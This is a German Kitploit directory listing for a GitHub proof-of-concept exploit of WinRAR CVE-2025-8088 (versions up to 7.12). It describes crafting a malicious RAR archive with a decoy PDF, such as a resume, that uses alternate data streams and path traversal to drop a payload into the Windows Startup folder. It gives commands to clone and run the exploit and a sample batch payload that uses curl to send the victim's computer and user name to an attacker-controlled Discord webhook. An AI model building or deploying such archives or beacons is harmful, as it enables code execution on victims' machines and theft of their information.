Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
best-CVE-2025-8088 — Winrar CVE-Ausnutzung vor 7.13 unter Verwendung mehrerer ADS-Streams in einer einzigen Datei (benutzerdefinierte PDF-Implementierung) | Kitploit
Tools/GitHubGitHub/pentestfunctions/best-cve-2025-8088
SchwachstellenanalyseExploitationPost-ExploitationPenetrationstestsRed TeamingPayload-EntwicklungBinary-Exploitation
GitHubpentestfunctions/best-cve-2025-8088

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

best-CVE-2025-8088

Winrar CVE-Ausnutzung vor 7.13 unter Verwendung mehrerer ADS-Streams in einer einzigen Datei (benutzerdefinierte PDF-Implementierung)

Repository anzeigen
11vor 11 MonatenNoch nicht geprüft

CVE-2025-8088 WinRAR-Exploit 🔓

Ein Proof-of-Concept-Exploit für die WinRAR-Sicherheitslücke (CVE-2025-8088), die die Versionen 7.12 und niedriger betrifft. Dieses Tool erstellt ein schädliches RAR-Archiv, das Payloads in Alternate Data Streams (ADS) mit Path Traversal einbettet, was möglicherweise zu beliebiger Codeausführung führt.

  • Das Problem bei vielen anderen ist, dass sie nicht mehrere ADS-Streams einbetten, was entweder Glück erfordert, den richtigen Path Traversal zu haben, oder den genauen Benutzernamen/Extraktionsverzeichnis zu kennen.

🚀 So funktioniert es

  1. Erstellt ein Täuschungsdokument 📄 - Generiert ein professionell aussehendes PDF (Lebenslauf oder Pentest-Bericht)
  2. Bettet mehrere ADS-Streams ein 🔄 - Fügt Payload-Streams mit verschiedenen Path-Traversal-Tiefen hinzu
  3. Manipuliert RAR-Header ⚙️ - Ändert die Archivstruktur, um die Path-Traversal-Sicherheitslücke auszunutzen
  4. Legt Payload im Startup-Ordner ab 📂 - Versucht, den Payload beim Extrahieren in den Windows-Autostart-Ordner zu schreiben

🛠️ Verwendung

root@kitploit:~
# Clone the repository
git clone https://github.com/pentestfunctions/best-CVE-2025-8088.git
cd best-CVE-2025-8088

# Install dependencies
pip install reportlab

# Run the exploit
python CVE-2025-8088.py

✏️ Payload-Anpassung

Edit the payload to call a Discord webhook:

root@kitploit:~
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""

Ersetzen Sie YOUR_DISCORD_WEBHOOK_URL durch Ihre tatsächliche Webhook-URL.

🔄 Ausführungsablauf

  1. Das Opfer extrahiert die RAR-Datei mit einer anfälligen WinRAR-Version (≤7.12)
  2. Der Payload wird in den Autostart-Ordner geschrieben:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. Beim nächsten Neustart ➡️ wird der Payload automatisch ausgeführt

📋 Anforderungen

  • Windows-Betriebssystem 🪟
  • Python 3.x 🐍
  • WinRAR installiert
  • ReportLab-Bibliothek (pip install reportlab)
Tool herunterladen